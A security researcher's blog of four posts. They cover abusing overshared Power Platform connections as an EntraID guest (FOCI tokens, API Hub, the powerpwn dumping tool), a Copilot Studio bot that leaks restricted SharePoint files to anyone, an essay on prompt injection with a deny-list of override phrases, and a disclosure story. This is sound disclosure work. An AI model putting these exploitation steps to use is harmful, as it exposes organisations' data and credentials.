Recent Posts

All You Need Is Guest

May 04, 2024

This is a long overdue blog version of a talk I gave at BlackHat USA 2023 titled All You Need Is Guest. Slides and video recording are available as well.

Intro

When you get invited as a guest to an EntraID tenant you get restricted deny-by-default access. You shouldn’t have access to any resource not explicitly shared with you, right?

Guest resource access is deny-by-default

Well, no. By the end of this post, you’ll see how guests can find credentials to Azure resources and SQL servers and exploit them to get full data dumps of everything behind them.

PowerPwn finds credentials available for guests to abuse

PowerPwn dumps sensitive corporate data

Why invite guests in?

As a small cybersecurity company, we start every enterprise engagement the same way – how do we share sensitive data back and forth? We don’t want to use email (you’ve never done that, right?).

Sharing sensitive files via email

How do we share resources securely? EntraID external identities – guests – are the mechanism to do that in a safe way.

EntraID external identities

To accomplish that, the mechanism needs to satisfy two conditions: it needs to be easy for vendors to onboard, and easy for IT/security to control.

Indeed, it’s super easy to gain access, and thus for vendors to onboard. Under the default configuration, any user on Teams can just invite a guest in by adding them to a new team. In most enterprises, this is left up to individual user choice.

For IT/security the promise is incredible - by inviting guests in you can apply your existing Microsoft security infrastructure to them. Conditional access policies, Intune, the entire Microsoft Security stack.

Microsoft Security suite applies to guests

There is a caveat here though: it is crucial that guests don’t get full access to your tenant, otherwise you have just compromised your own controls. Guest access should be deny-by-default.

Guest access must be deny-by-default

Guest accounts in practice

Reality differs. Grab any corporate account, go to make.powerapps.com and click on connections.

Enter Power Apps

You will see enterprise credentials lying around waiting to be leveraged.

Power Apps shared connections
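You don’t even need the UI. Here is a minimal sketch of listing those shared connections programmatically; the endpoint, api-version and response shape are assumptions based on what make.powerapps.com itself calls, not a documented API:

```python
# Hedged sketch: enumerate connections visible to the signed-in user.
# Endpoint and parameters are inferred from observed browser traffic.
import requests

TOKEN = "<access token for https://service.powerapps.com/>"
ENVIRONMENT_ID = "<environment id>"

resp = requests.get(
    "https://api.powerapps.com/providers/Microsoft.PowerApps/connections",
    params={
        "api-version": "2016-11-01",
        "$filter": f"environment eq '{ENVIRONMENT_ID}'",
    },
    headers={"Authorization": f"Bearer {TOKEN}"},
)
resp.raise_for_status()
for conn in resp.json().get("value", []):
    props = conn.get("properties", {})
    print(conn["name"], props.get("apiId"), props.get("displayName"))
```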

These were overshared due to a simple mistake by a business user. They are available for ANY EntraID account to pick up and use, including guests.

Connections are shared with EVERYONE

These connections are created by business users. Or more precisely, anyone in your organization can just plug in their credentials and create a connection. There are thousands of connectors available, covering any enterprise system you can think of. Including on-prem.

Connections created by citizen developers

Exploit

These credentials are not just available for direct use. They are also used to give Power Apps or Power Automate access to enterprise resources.

There are a few mechanisms protecting these credentials from a wandering guest (or a malicious insider, for that matter). Most of the talk was focused on bypassing each and every one of those. Here is a quick overview of each:

Blocked by license

Guests cannot view Power Apps or query connections through Power Apps because they don’t have the right license. While licensing is definitely not a security mechanism, it is sometimes used as one nevertheless.

Guests are blocked by license

But wait, what if we get a trial license on our home tenant - the one we control? That should work for the guest tenant, right?

Well, it works! Power Apps validates that you have a license in at least one of the tenants you are a member of, not the specific one you are trying to access.

Blocked by DLP

The main security mechanism for Power Platform is its DLP. Do not get confused, this is not a DLP in the cybersecurity sense. It does not allow labeling of sensitive data, nor does it provide data leakage controls. Instead, it is an allow/deny list for which connectors can be used. It provides very blunt controls - allowing or blocking entire categories of services like SharePoint or SQL Server. If you want to get to a more granular level, you need to manage a tight and ever-changing URL list.

It is also VERY easy to bypass.

Nevertheless, it can deny access to connections if those are blocked by the DLP policy. Here, we have a DLP policy that blocks SQL Server connections.

Access blocked by DLP

At this point, I basically had to wave my hands and ask the audience to allow me to move forward. I will share full details on a subsequent post.

DLP bypass to be disclosed

Say the connection isn’t blocked by DLP then. What now?

Digging into the API calls made by a Power App using a SQL Server connection, you can spot a call to a service called API Hub. Through those calls, the app performs both read and write operations on top of the SQL server.

Digging into Power Apps API calls

Power Apps uses API Hub

API Hub is an intermediary service that allows Power Platform apps and users to use shared credentials without actually getting access to the credentials themselves. Instead, API Hub generates a REST API interface for any imaginable operation on the underlying service. Any call to API Hub gets translated into a call to the underlying service using the credentials stored in its internal storage. Those can be user credentials (OAuth refresh tokens), passwords or long-lived secrets. This is how connection sharing works: sharing a connection in Power Platform means allowing another user to use your credentials, which are stored in API Hub.
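To make that concrete, here is roughly what a direct API Hub call looks like. The URL shape is an assumption inferred from traffic captured from a running Power App, not a documented contract; the key point is that the caller presents a connection id and a token, never the underlying credential:

```python
# Hedged sketch: list databases through a shared SQL connection via API Hub.
# <region>, the route and the response shape are illustrative assumptions.
import requests

APIM = "https://<region>.azure-apim.net"      # API Hub front end (assumed)
CONNECTION_ID = "<shared SQL connection id>"  # the thing that was overshared

resp = requests.get(
    f"{APIM}/apim/sql/{CONNECTION_ID}/v2/datasets",
    headers={"Authorization": "Bearer <token scoped to API Hub>"},
)
# API Hub replays the stored credential against the SQL server and returns
# the result, so the caller never touches the secret itself.
print(resp.json())
```

The only missing ingredient is that token, which brings us to the next hurdle.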

Blocked by programmatic access to API Hub

Users can’t just generate tokens with the right scope to query API Hub; it is an internal Microsoft resource.

You can’t use a built-in public client app because those need to be pre-approved to query API Hub.

You can’t use your own app because API Hub is an internal resource you cannot grant your apps access to.

A scope away from victory

FOCI to the rescue

At this point, we are stuck.

A bypass recap

We know that these credentials are available for us in the Power Apps UI but we want direct access to API Hub. We can’t generate the right token though.

We know that the Power Apps app can generate tokens to API Hub, but it is a confidential app so we can’t generate tokens on its behalf.

Solving for API Hub scope

Or can we?

Recalling FOCI (Family of Client IDs), we can take a look at the list of known FOCI apps.

FOCI apps

We can generate a token using Azure CLI (of course we can) and exchange that token for a Power Apps token to API Hub! Actually, it turns out you can just ask Azure CLI for a token to API Hub directly.
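In code, that boils down to signing in with a FOCI family member’s well-known public client id and asking for an API Hub audience. A minimal sketch using MSAL, where the API Hub resource URI is my assumption and the client id is the well-known Azure CLI one:

```python
# Hedged sketch: acquire an API Hub token as a guest using the Azure CLI
# public client id (a known FOCI family member). The resource URI below is
# an assumption; equivalently: az account get-access-token --resource <uri>
import msal

AZURE_CLI_CLIENT_ID = "04b07795-8ddb-461a-bbee-02f9e1bf7b46"
app = msal.PublicClientApplication(
    AZURE_CLI_CLIENT_ID,
    authority="https://login.microsoftonline.com/<guest_tenant_id>",
)
flow = app.initiate_device_flow(scopes=["https://apihub.azure.com/.default"])
print(flow["message"])                      # complete sign-in in a browser
result = app.acquire_token_by_device_flow(flow)
print(result["access_token"][:40] + "...")  # a token API Hub will accept
```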

The fun part

powerpwn is an offensive toolset for M365 focused on Power Platform. By combining the methods above, it gives us full access to the services behind those credentials shared in Power Platform.

It can also install a backdoor that persists even if the user gets deleted, deploy a phishing app on a Microsoft-owned domain and more. But that is a story for another day.

Introducing PowerPwn

powerpwn recon -t <tenant_id> finds all of the overshared credentials, apps and automations your user has access to.

powerpwn recon

powerpwn dump -t <tenant_id> goes through each and every one of those and dumps all data from their underlying services. Every SQL server table, every blob in a storage account.

powerpwn dump

You also gain access to a full Swagger UI for each credential that allows you to run arbitrary commands using those credentials (whatever is possible in Power Platform). For SQL Server, you can pass any SQL command to run on the server.

powerpwn playground
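Under the hood the playground is just a Swagger UI over API Hub, so each command boils down to one REST call. A hedged sketch for the SQL Server case, with the route inferred from the SQL connector’s Swagger (treat the exact path as an assumption):

```python
# Hedged sketch: pass raw SQL through a shared connection. Whatever the
# stored credential can do on the server, this request can do too.
import requests

APIM = "https://<region>.azure-apim.net"
CONNECTION_ID = "<shared SQL connection id>"
DATASET = "<server>,<database>"  # the SQL connector addresses targets this way

resp = requests.post(
    f"{APIM}/apim/sql/{CONNECTION_ID}/v2/datasets/{DATASET}/query/sql",
    headers={"Authorization": "Bearer <token scoped to API Hub>"},
    json={"query": "SELECT name FROM sys.tables"},  # any SQL the credential allows
)
print(resp.json())
```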

I strongly encourage you to play around with it!

Defense

Tactically, use powerpwn. Find and delete these overshared connections. Ideally, do it on a schedule or even automate it, as in the sketch below.
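A rough sketch of what that schedule could look like, as a hypothetical wrapper around the powerpwn CLI shown above (run it from cron or a CI schedule):

```python
# Hedged sketch: periodic recon for overshared connections. This wrapper is
# hypothetical, not part of powerpwn itself; cleanup stays a human decision,
# since deleting a connection someone depends on breaks their apps.
import subprocess

TENANT_ID = "<tenant_id>"

# Enumerate overshared credentials, apps and automations for review.
subprocess.run(["powerpwn", "recon", "-t", TENANT_ID], check=True)
# Review the generated report, then delete what shouldn't be shared.
```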

But admittedly this is a tactical patch. We are placing dev-level power in the hands of every enterprise user without guardrails or training. Of course people will make bad judgment calls. Still, sharing with everyone? That is just too much.

Who owns AppSec for business users?

I strongly suggest using the OWASP LCNC Top 10 to start getting a handle on citizen development.


Security for AI is the Next Big Thing! But we don't really know what it means yet

January 28, 2024

As AI continues to capture everyone’s attention, security for AI becomes a popular topic in the market. Security for AI is capturing the media cycle, AI security startups are going out of stealth left and right, and incumbents scramble to release AI-relevant security features. In our small patch of the world, it is clear security teams are concerned about AI. It seems like the race has begun and we can just about see an AI Security category being formed.

But what does AI Security mean exactly?

The problem with AI capturing mindshare is that everyone finds a way to talk about their existing solution in AI language, making it difficult to tell one solution from another.

We also frankly don’t really know what security for AI means because we don’t know what AI development means. Security for X typically arrives after X has matured – think cloud, network, web apps – but AI remains a moving target.

From my perspective right now, there are three distinct solution categories all claiming to be AI Security solutions. These three solve different problems for different people, so I argue that these are fundamental distinctions that will not easily merge, though of course they do have some overlap.

These categories are:

  1. AI DLP
  2. AI Firewall
  3. AI SPM / CNAPP

AI DLP

Fast to gain traction, fast to disappear (I claim).

When ChatGPT was first launched, every enterprise I know went down the same route of trying desperately to block it. Every week brought new headlines about companies losing their IP to AI because an employee copy-pasted highly confidential data into the chat so they could ask for a summary or a funny poem about it. This was really all anybody could talk about for a few weeks.

Point solutions to address this problem have popped up like mushrooms after heavy rain. Since you couldn’t control ChatGPT itself, or the other AIs that started appearing on the consumer market, all of these solutions are different types of proxies. Whether it’s on the network layer, with a host agent or through a browser extension, AI DLP solutions promise to stop rogue users from using unapproved public AI bots and in some cases point users to approved enterprise versions like Azure OpenAI. This problem got so much attention that OpenAI, who caused the scare in the first place, changed their policies so users can now opt out of being included in the training set and organizations can pay to opt out on behalf of all their users.

I am bearish about AI DLP. While these solutions were quick to gain traction reacting to public emotions, I don’t see why AI DLP is fundamentally different from a regular DLP or its modern uncle, the CASB. At the end of the day, users copy-pasting sensitive data to a random website on the Internet is an old problem. Not sure why AI makes it different.

Another point about AI DLP is that it can only observe user interaction with AI and completely misses applications that use unapproved AI services.

AI Firewall

Think about SQL injection, which prompted the rise of the AST industry. It is an issue of data being interpreted as instructions, allowing people who manipulate application data (i.e. users) to manipulate application instructions (i.e. its behavior). After years of severe issues wreaking havoc on poor web applications, application development frameworks rose to the challenge and now safely handle user input. If you’re using a modern framework and going through its paved road, SQL injection is for all practical purposes a solved problem.
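The paved road in practice is parameterization: user input stays bound as data and is never spliced into the SQL text. A tiny sketch, using Python’s built-in sqlite3 as a stand-in for any modern driver:

```python
# Parameterized queries keep data and instructions separate: the payload
# below is stored as a value, not executed as SQL.
import sqlite3

conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE users (name TEXT)")

user_input = "alice'; DROP TABLE users; --"
conn.execute("INSERT INTO users (name) VALUES (?)", (user_input,))  # bound, not concatenated

print(conn.execute("SELECT name FROM users").fetchall())  # table survives
```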

One of the weird things about AI models from an engineer’s perspective is that they mix instructions and data. You tell the AI what you want it to do with text, and then you let your users add some more text into essentially the same input. As you would expect, this results in users being able to change the instructions. Using clever prompts lets you do that even if the application builder really tried to prevent it, a problem we all know today as prompt injection.

Some solutions have popped up to try and help application developers avoid prompt injection. They employ a bunch of techniques to do that, including threat intelligence (i.e. a list of prompts that work), crowdsourcing and, of course, using AI to fight AI. For an application developer, this typically involves deploying a middleware that acts as a security mechanism between your application and the AI model and fails any injection attempt.
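A toy sketch of that middleware pattern, with a deny-list standing in for the threat intel, crowdsourced and model-based detectors real products use:

```python
# Hedged sketch of an "AI firewall" middleware: screen user input before it
# reaches the model, fail the request on a suspected injection. The deny-list
# is a stand-in; real products layer several detection techniques.
KNOWN_INJECTIONS = (
    "ignore previous instructions",
    "disregard the system prompt",
    "reveal your instructions",
)

def guarded_completion(model_call, system_prompt: str, user_input: str) -> str:
    lowered = user_input.lower()
    if any(pattern in lowered for pattern in KNOWN_INJECTIONS):
        raise ValueError("possible prompt injection, request blocked")
    return model_call(system_prompt, user_input)  # only clean input reaches the model
```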

AI models have also improved their inherent resistance to these kinds of attacks, but whether this problem can ever truly be solved remains an open question.

Prompt injection is not the only concern addressed by the AI Firewall category. In fact, some companies have been working on related problems of model theft, model poisoning and model drift for several years now, ever since the AI research community discovered adversarial learning. I place these under the same category because they too act as middleware between your application and the AI model, and I doubt people will deploy more than one middleware.

For AI application developers, trying to control these uncontrollable models is a real challenge. This is a security concern, but it is also a predictability and usability concern. Therefore, I believe these concerns are best served as important features of AI application development platforms.

AI SPM / CNAPP

Once you allow AI to act on the user’s behalf and chain those actions one after the other you’ve reached uncharted territory. Can you really tell if the AI is doing things it should be doing to meet its goal? If you could think of and list everything the AI might need to do then you arguably wouldn’t need AI in the first place.

Importantly, this problem is about how AI interacts with the world, and so it is as much about the world as it is about the AI. Most Copilot apps are proud to inherit existing security controls by impersonating users, but are user security controls really all that strict? Can we really count on user-assigned and managed permissions to protect sensitive data from a curious AI?

The problem here is how to build an AI application that interacts with the world in creative ways, but only the creative ways we actually want without any nasty side effects. This category is the least developed, and it is unclear if it’s even one category or if it’s a job for the application development platform or an external security solution. One thing is clear though, the first step is having a deep and precise understanding of the AI application’s environment. Which identities is it using, what components can it run, on which network, and how do they interact with other regular or AI-powered applications.

A finishing thought

Trying to say anything about where AI, or by extension AI security, will end up is trying to predict the future. We all know the saying: it’s difficult to make predictions, especially about the future. Let’s see how this post holds up and where I’ll be most wrong.


Copilot exfiltrates High Restricted SharePoint files to any user on the Internet, no auth required

December 03, 2023

Microsoft Copilot Studio allows users to quickly build enterprise Copilots on top of their business data. Every enterprise user can now plug enterprise data into GPT models and share their bots with the world.

What could go wrong?

Public access to High Restricted SharePoint sites

Data leakage, to name one thing.

Here’s HackerBot. It’s a simple Copilot that allows you to enumerate and download any file from the “HR Compliance” SharePoint site, which has a “High Restricted” sensitivity label. To use HackerBot you simply need to navigate to its public URL. No authentication required.

HackerBot leaks High Restricted files to any user on the Internet

If you’d like to play around with it yourself, reach out and I’ll provide a link.

But Microsoft says this is not possible

Microsoft actually identified this scenario and has a big red warning in its Docs saying that this scenario (public user access + Copilot access to SharePoint/OneDrive) is blocked.

"The No authentication and Only for Teams authentication options can't retrieve information from Sharepoint or OneDrive for Business."

So what is going on here?

Analysis and workaround

When you create a new copilot you are prompted to provide a URL, which can be a public site, a SharePoint site or a OneDrive directory. If you provide a SharePoint/OneDrive URL, Microsoft will publish your bot but indeed suspend it until you change the default configuration and switch to authenticated access.

Create Copilot with SharePoint access

Authentication error

This makes sense following the note on Microsoft Docs.

However, this is just one of many ways to provide the copilot with access to business data, including SharePoint. Those include Topics, Plugins and Skills, to name a few.

HackerBot works with Topics. A topic is a particular thing the copilot can do for you: a scripted conversation, access to resources or performing actions on your behalf. Copilot routes users to the right topic by specific trigger words (or a GenAI decision). HackerBot has an “ExfiltrateSharePoint” topic triggered by words like “Exfiltrate”, “SharePoint”, “Data” and “Confidential”.

HackerBot ExfiltrateSharePoint topic

HackerBot ExfiltrateSharePoint trigger words

Topics can be set to use hundreds of connectors that allow access to any business platform you can imagine. If you can’t find your desired platform on the list, you can also trigger a full-blown automation, use a free-style HTTP request or build a custom connector.
If you’re familiar with Power Platform, a topic looks very much like a Power Automate flow (though there’s no 1:1 feature parity).

HackerBot uses a connection to SharePoint to enumerate files on the “HR Compliance” site, and then triggers a flow to retrieve the file’s content base64 encoded.

HackerBot enumerates a High Restricted SharePoint site

HackerBot leaks file content
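Turning the leaked chat response back into the original file is one decode away. A minimal sketch; the names here are illustrative:

```python
# Hedged sketch: the flow returns file bytes as base64 text inside the chat
# response; decoding recovers the original document.
import base64

chat_response = "<base64 blob returned by the ExfiltrateSharePoint topic>"
with open("exfiltrated_file", "wb") as f:
    f.write(base64.b64decode(chat_response))
```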

To allow public access to unauthenticated users, I just left the default setting as is.

Default Copilot Studio authentication settings

That’s it, it’s that simple.

One thing should be bugging you at this point: if users are not authenticated, how is HackerBot able to fetch data from an enterprise SharePoint site?

Credential Sharing as a Service yet again

The answer is a recurring theme with LCNC platforms and Microsoft Power Platform in particular.

Apps work by user impersonation. When I created HackerBot, I had to provide my credentials as a Copilot maker to run and debug the “ExfiltrateSharePoint” topic. These creds, in this case an OAuth refresh token, are stored by Microsoft and replayed any time a user talks to Copilot.

FAQ

Tenant boundaries (2023-12-04): To clarify, HackerBot can only access SharePoint sites its maker can access. In particular, that means only sites that belong to this maker’s tenant. The issue, however, is that HackerBot users are not authenticated, don’t have relevant permissions and don’t belong to this tenant (or to any tenant, for that matter).

HackerBot’s maker (2023-12-04): Any user on any tenant can create HackerBot. Licenses are given automatically. Required permissions (Environment Maker in Power Platform) are assigned by default.


My intense 2am conversation with MSRC a week before BlackHat

September 16, 2023

Research as usual

A couple of months before BlackHat (USA 2023) I got an email from Microsoft Security Response Center. They saw the abstract of my upcoming BlackHat talk and were like, Hi, you’re not planning on dropping any 0days on us, are you? Nahh, we’re sure you’re not that type of researcher. We must keep our customers safe, you know.

I was expecting this after getting a similar email before my NoCodeMalware talk at defcon last year, so I responded casually that they shouldn’t worry, that I wouldn’t be sharing any undisclosed vulns, and that I’m happy to share my slides to help them see that. Based on my defcon experience I expected that to be it. Ohh boy, was I wrong.

You see, things are fine and dandy until you’re seen as a threat. Sure, the PR parts of the house might downplay your research and say that it’s contrived. Heck, they might even flat out say that you’re wrong and misleading. But the technical folks getting those disclosures will continue being friendly and collaborative in parallel. When you really hit a nerve, though, and they fear you might use it to put them in a bad position, the conversation changes.

Sunlight is the perfect cure

Three weeks before the conference I had the opportunity to discuss my then-upcoming talk with Dark Reading’s Ericka Chickowski. Ericka was awesome. The conversation went great; we discussed the issues at hand, customers’ responsibility in owning their LCNC apps, and driving them to action with clear in-your-face demonstrations like this one. That conversation led to an article. That article found its way to the top slot on Dark Reading. Customers saw it, emails started pouring in. Microsoft got pissed.

At this point, the conversation with MSRC had been slowly moving forward in the background. I gave them early access to powerpwn, I shared the agenda and promised to share slides once I had a draft ready. I did have a few open vuln disclosures at the MSRC portal waiting for a review with no apparent urgency, and was waiting on a verdict to see if they could be part of the talk. Tbh, based on my previous experience reporting logic-type bugs to the Power Platform team and getting them rejected as by-design, I didn’t expect any difference here. Others have had a similar experience.

That kind of researcher

But the DR article completely changed the conversation. Pretty soon, I was dealing with an entire group of folks across MSRC and the Power Platform team. It was clear my case got escalated and I was now considered that kind of researcher. What followed was an intense week where the team and I were having difficult conversations for a few hours every day (or mostly night, given the time difference). The conversations were also very nice and polite, and both MSRC and I made sure to clarify that we appreciate each other’s work. But we did exchange some strong messages. At the end of the day it was about trust (isn’t it always?). They didn’t trust me not to drop 0days and put customers at risk. I didn’t trust them to fix the issues without overwhelming public pressure.

I thought they were trying to get me to pull the talk. I feared they would use their corporate magic powers to make it go away along with hours of hard work. They never said anything about legal action, but they didn’t have to for it to be there in my head. I thought about the negative impact on our company, which works closely with large Microsoft shops, and its employees. I thought about the negative impact on my own credibility.

At this point I also started doubting myself. I was doing this to help shed light on a risk that’s already being exploited in the wild. To push customers and Microsoft to take responsibility and drive action. Or was I just telling myself that to justify boosting my own ego? I am well aware that security research is a double-edged sword, and that what I was about to reveal to the community could be used for good and bad. Was I doing everything I could to make sure the outcomes are positive for the industry? Talking to the company lawyer, who basically told me that I should pull the talk proactively to protect my company, didn’t help either (note: at this point, I should have gone to the amazing folks at EFF). So I reached out to some security friends whom I absolutely trust and asked for their take on things. I wanted to know what they would have done. I wanted them to tell me the hard truth.

They did. The hard truth was that I was absolutely fine and doing the right thing. They also helped me navigate the sharp edge I had to travel along: how do I push forward, shedding light on this issue in the most responsible way, one that leaves everyone better for it afterwards? I came off these discussions with a strong sense of purpose and confidence in my path forward. Thank you, you know who you are.

Look, this is not what I wanted to be doing a week before the conference. I had a full backlog of finishing off my presentation, making final touches to powerpwn and prepping for meetings. But most of all, I wanted to have some off time with my family before I disappeared for a week.

At this point, I would like to acknowledge the amazing folks I got to meet at Microsoft during these difficult conversations. While I am critical of Microsoft as an organization, I have nothing but respect for the MSRC and Power Platform folks who handled my case. This could have been a very bad experience, but it wasn’t. I wouldn’t say it was stress-free, but the team was professional, respectful, clear and absolutely wanted to find a win-win, and for that I thank them.

Back to normal

After several hours of video calling, we got to the crux of it. From their side, they were worried I was going to drop a 0day DLP bypass vuln which I had reported and they were now fixing (more on that coming soon). From my side, I wanted to hold them accountable to my open reports, and for them to publicly acknowledge that recent Power Automate Desktop improvements were a direct result of my defcon research. Last year they downplayed the issue, took more than 6 months to (partially) fix it and didn’t provide any acknowledgement. Once we both understood what the other side was really hurting about, fixing these was easy. I promised I would not expose any technical details about the vuln and coordinated the messaging around that with them, and they made an effort to acknowledge my research and provided clarity on existing reports. Once this was done, you could just feel the change in atmosphere. We were no longer in crisis mode, we were building a collaboration.

After the talk, TheRegister’s Brandon Vigliarolo published an amazing deep dive into the issues I’ve uncovered and what they mean to Microsoft customers. I’m sure they found it difficult to read. But this time, there was no PR response downplaying the issue.

That same evening I had the opportunity to meet in person some of the Microsoft team members I’d been video calling with, alongside other folks in Microsoft’s security organization. Those conversations were absolutely positive. I felt a sincere attempt to do good together. I even got to laugh around with members of a team that was actively working on reacting to the research I’d just shared, i.e. people whose weekend I’d just ruined, who were awesome about it.

The aftermath

The reaction to my talks has been overwhelming. Other hackers and researchers have been really supportive and were asking about what comes next. Security engineers and architects at large Microsoft shops asked for practical advice and tooling. The reaction on social media has been positive. Thank you everyone.

I’m most happy about learning that several huge organizations are now going through a complete overhaul of their guest strategy and their LCNC initiatives. The combined impact of the talks, the powerpwn tool and the community reaction created urgency and buy-in which security leaders across the industry are now using to go and fix problems that require heavy lifting. As we all know, big changes are always put on perpetual snooze until something makes them urgent. This is now urgent, which means we now have a window to go ahead and make things better. That is the outcome I was hoping for.
